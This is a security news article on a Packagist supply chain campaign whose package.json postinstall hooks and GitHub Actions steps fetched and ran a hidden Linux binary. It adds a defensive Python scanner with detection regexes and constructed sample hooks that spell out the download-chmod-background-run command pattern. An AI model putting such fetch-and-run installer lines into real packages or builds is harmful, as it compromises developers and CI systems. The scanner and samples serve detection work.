
A new “coordinated” supply chain attack campaign affected eight packages on Packagist that contained malicious code designed to execute Linux binaries retrieved from GitHub release URLs.
“The affected packages were all Composer packages, but the malicious code was not added to composer.json,” Socket said. “Instead, it was inserted into package.json for projects that ship JavaScript build tools along with PHP code.”
This “cross-ecosystem deployment” makes the activity less visible to developers and security teams scanning PHP dependencies, who may focus only on Composer-related metadata and skip the package.json lifecycle hooks bundled within the packages. The malicious versions have since been removed from Packagist.
Analysis of the packages reveals that the upstream repositories were modified to include a post-installation script that attempts to download a Linux binary from a GitHub release URL (github[.]com/parikhpreyash4/systemd-network-helper-aa5c751f) into the “/tmp/.sshd” directory, uses “chmod” to make it executable for all users, and runs it in the background.
The package names and the affected versions are listed below.
moritz-sauer-13/silverstripe-cms-theme (dev-master)
crosiersource/crosierlib-base (dev-master)
devdojo/wave (dev-main)
devdojo/genesis (dev-main)
katanaui/katana (dev-main)
Elitedevsquad/sidecar-laravel (3.x-dev)
r2luna/brain (dev-main)
baskarcm/tzi-chat-ui (dev-main)

Socket’s investigation found references to the same payload across 777 files on GitHub, suggesting that it may be part of a broader campaign; in at least two cases the payload had been added to a GitHub Actions workflow file. However, it is currently unclear how many of these references correspond to individual compromises, forks, duplicate package artifacts, or cached copies.
“This suggests that the attackers did not rely on a single execution mechanism. In the package artifact, the payload was triggered through the package.json post-installation script,” the application security firm said. “In the workflow file, it was placed to run during a GitHub Actions job.”
Furthermore, the exact nature of the payload downloaded from GitHub is unknown, as the GitHub account associated with the repository hosting it is no longer available. The name given to the downloaded binary, “gvfsd-network”, is notable: it mimics the GNOME Virtual File System (GVfs) daemon component of the same name, which browses network shares. The legitimate daemon is installed with the GNOME desktop stack and never runs from /tmp, so on a headless build server or CI runner a process by that name is itself a strong anomaly worth alerting on.
“Even without the second-stage binary, a malicious installer is enough to warrant blocking,” Socket said. “It executes code remotely during the installation or build workflow and attempts to hide its activity by disabling TLS validation, suppressing errors, and running downloaded binaries in the background.”
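As an added example (not Socket’s code, and not code from any of the affected projects), the following Python scanner applies the indicators quoted above to the two vectors the campaign used: package.json lifecycle hooks and the run: steps of a GitHub Actions workflow. It flags a remote fetch, a dot-prefixed /tmp directory, a chmod granting execute, background execution, TLS validation disabled, and suppressed errors, and treats two or more indicators on one hook as the blocking threshold. The package.json and workflow it scans are constructed to resemble the pattern described in the article; the package name, the example.invalid host and the step names are made up, and the regexes are triage heuristics rather than signatures.

```python
"""Heuristic scanner for the installer behaviour described in the article.

Added example, not code from Socket or from any affected project. Scans
package.json lifecycle hooks and GitHub Actions `run:` steps for the
indicators quoted in the article. All sample inputs below are constructed.
"""
import json
import re

# Hooks that npm, yarn and pnpm execute automatically during installation.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# (label, pattern) pairs. Triage heuristics, not exploit signatures.
INDICATORS = [
    # curl/wget fetching a URL within the same shell command
    ("remote_fetch", re.compile(r"\b(?:curl|wget)\b[^|;&\n]*https?://")),
    # dot-prefixed directory under /tmp, e.g. /tmp/.sshd
    ("hidden_tmp_path", re.compile(r"/tmp/\.[A-Za-z0-9_.-]+")),
    # chmod granting execute: symbolic (+x, a+x) or an octal mode containing 7
    ("chmod_exec", re.compile(r"\bchmod\s+(?:[ugoa]*\+x|[0-7]*7[0-7]*)\b")),
    # trailing single '&' (not '&&'), nohup, setsid or disown: detach from installer
    ("background_exec", re.compile(r"(?:(?<!&)&\s*$|\bnohup\b|\bsetsid\b|\bdisown\b)",
                                   re.MULTILINE)),
    # TLS validation disabled: curl -k/--insecure, wget --no-check-certificate, Node env
    ("tls_disabled", re.compile(
        r"(?:\bcurl\b[^|;&\n]*\s-[a-zA-Z]*k\b|--insecure\b|--no-check-certificate\b"
        r"|NODE_TLS_REJECT_UNAUTHORIZED=0|rejectUnauthorized:\s*false)")),
    # output discarded or failure masked with '|| true'
    ("errors_suppressed", re.compile(
        r"(?:2>\s*/dev/null|>\s*/dev/null\s+2>&1|&>\s*/dev/null|\|\|\s*true\b)")),
]


def scan_command(cmd):
    """Return the labels of every indicator that fires on one shell command string."""
    return [label for label, rx in INDICATORS if rx.search(cmd)]


def is_suspicious(labels):
    """Two or more independent indicators on one hook is the blocking threshold used here."""
    return len(labels) >= 2


def scan_package_json(text):
    """Map each lifecycle hook that fires at least one indicator to its labels."""
    try:
        scripts = json.loads(text).get("scripts", {})
    except (json.JSONDecodeError, AttributeError):
        return {}
    hits = {}
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if isinstance(cmd, str) and (labels := scan_command(cmd)):
            hits[hook] = labels
    return hits


RUN_LINE = re.compile(r"^(\s*)(?:-\s+)?run:\s*(.*)$")


def extract_workflow_runs(yaml_text):
    """Collect the shell of every `run:` step without a YAML library.

    Handles `run: cmd` on one line and the block scalars `run: |` / `run: >`."""
    lines, runs, i = yaml_text.splitlines(), [], 0
    while i < len(lines):
        m = RUN_LINE.match(lines[i])
        i += 1
        if not m:
            continue
        indent, rest = len(m.group(1)), m.group(2).strip()
        if rest and rest[0] not in "|>":
            runs.append(rest)
            continue
        block = []  # block scalar: take every deeper-indented (or blank) line
        while i < len(lines) and (not lines[i].strip()
                                  or len(lines[i]) - len(lines[i].lstrip()) > indent):
            block.append(lines[i].strip())
            i += 1
        runs.append("\n".join(block).strip())
    return runs


def scan_workflow(yaml_text):
    """Return (run_step_index, labels) for every `run:` step that fires an indicator."""
    return [(i, labels) for i, run in enumerate(extract_workflow_runs(yaml_text))
            if (labels := scan_command(run))]


# Constructed package.json shaped like the article's description; name and host are made up.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "example-theme-assets",
    "scripts": {
        "build": "vite build",
        "postinstall": ("mkdir -p /tmp/.sshd && "
                        "curl -fsSLk https://example.invalid/releases/v1/gvfsd-network "
                        "-o /tmp/.sshd/gvfsd-network 2>/dev/null; "
                        "chmod 755 /tmp/.sshd/gvfsd-network; "
                        "nohup /tmp/.sshd/gvfsd-network >/dev/null 2>&1 &"),
    },
})

# Constructed workflow: one clean step, one step carrying the same installer pattern.
SAMPLE_WORKFLOW = """\
name: ci
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Install PHP deps
        run: composer install --no-interaction
      - name: Build assets
        run: |
          npm ci
          curl -sk https://example.invalid/r/gvfsd-network -o /tmp/.sshd/gvfsd-network
          chmod +x /tmp/.sshd/gvfsd-network
          /tmp/.sshd/gvfsd-network >/dev/null 2>&1 &
"""

if __name__ == "__main__":
    for hook, labels in scan_package_json(SAMPLE_PACKAGE_JSON).items():
        print(f"package.json {hook}: {labels} -> {'BLOCK' if is_suspicious(labels) else 'review'}")
    for idx, labels in scan_workflow(SAMPLE_WORKFLOW):
        print(f"workflow run step #{idx}: {labels} -> {'BLOCK' if is_suspicious(labels) else 'review'}")
```

Point it at vendor/*/*/package.json after a composer install and at .github/workflows/*.yml in the repositories you build from; a lone remote_fetch in a postinstall hook (a schema or asset download, say) stays at review, while the combination quoted by Socket lights up every indicator.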
